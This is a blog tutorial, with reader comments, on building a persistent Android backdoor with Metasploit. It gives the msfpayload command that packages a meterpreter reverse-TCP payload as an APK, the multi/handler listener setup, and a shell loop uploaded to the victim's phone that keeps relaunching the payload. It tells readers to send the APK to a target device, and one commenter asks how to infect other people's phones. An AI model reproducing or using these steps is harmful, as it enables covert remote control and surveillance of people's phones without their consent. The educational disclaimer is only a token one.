Android Linux Security

How to make a persistent Android backdoor using Metasploit

Metasploit is one of the most powerful pentesting and exploitation tools out there,  and in this tutorial,  I’ll show you how to use it to create an access backdoor on any android phone and gain control over it.

DISCLAIMER: All the information in this article is intended for educational purposes only. I am not responsible for any misuse. 

Step 0: Fire up Metasploit

If you’re using Kali Linux/BackBox/BackTrack, metasploit comes pre-installed with the system. Otherwise,  you can download it from:

To start it,  go to your terminal and type:


Wait for sometime,  and the metasploit CUI will start.

Step 1: Create your payload

Open a new terminal and type:

msfpayload android/meterpreter/reverse_tcp LHOST=<your public ip address> R > /root/<name>.apk

This will create the actual exploit apk in your root folder.

Step 2: Set up the handler

Now go to the first terminal we opened. The msfconsole should still be open. Type:

use exploit/multi/handler

set payload android/meterpreter/reverse_tcp

set LHOST <your internal ip>


A listener should open. Now just keep this listener open and send the apk to your target device. Wait for them to install and voila! You have a backdoor. Now let’s make it persistent!

Step 3: The persistence script.

Go to your root folder and create a new text file.

Write (Don’t copy!) the following lines in it:

while :
do am start --user 0 -a android.intent.action.MAIN -n com.metasploit.stage/.MainActivity
sleep 20

Save it as <name>.sh.  sh is important.

Step 4: Upload it!

Go to your exploit meterpreter shell and type:

cd /

cd /sdcard/Download

Check if you are in the correct directory by typing:


You should be in /storage/emulated/legacy/Download

Now upload the script:

upload <name>.sh

Step 5: Execute!



Now,  go to the place where you uploaded the script:

cd /

cd /sdcard/Download

Now,  type:

sh <name>.sh

Now press ctrl+c to exit shell.

Step 6: Testing!

Close the msfconsole terminal. Open a new terminal and redo Step 2. This time,  your terminal will instantly enter the meterpreter shell.


Note: The back door persistence will be disabled if the phone reboots.

17 replies on “How to make a persistent Android backdoor using Metasploit”

Argh…..I just can’t get past the step 1. Every time, it just shows this message :
bash: my_public_IP_address: No such file or directory
Of course, here, my_public_IP_address means what I really entered as my IP address.
Please help me out.

Haven’t tried this myself, but did u replace your public ip address with your IP? Let’s hope the author will answer you soon 🙂

Hy very nice it work’s !!!

Any idea for making it persistent after reboot?

When I reboot the phone I get a session because it start main activity,

But the shell doesn’t work anymore,

“Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.”

Anyone know were is main activity located in after a reboot ?


Hey Pain_tester, Wait, it actually worked? What did you enter in your public IP address? The IP address of the phone? or the Computer? It just isn’t working for me. Can you help me out?

Error: Activity not started, unable to resolve Intent { act=android.intent.action.MAIN cat=[android.intent.category.LAUNCHER] flg=0x10000000 pkg=–user }

Guys it worked but it work on my phone but am have a problem with the upload it just come that script to my and it but how can I upload it to other peoples the shall is giving error

not working for me
I get this error:
Error: Activity class {com.metasploit.stage/com.metasploit.stage.MainActivity} does not exist.

Leave a Reply

Your email address will not be published. Required fields are marked *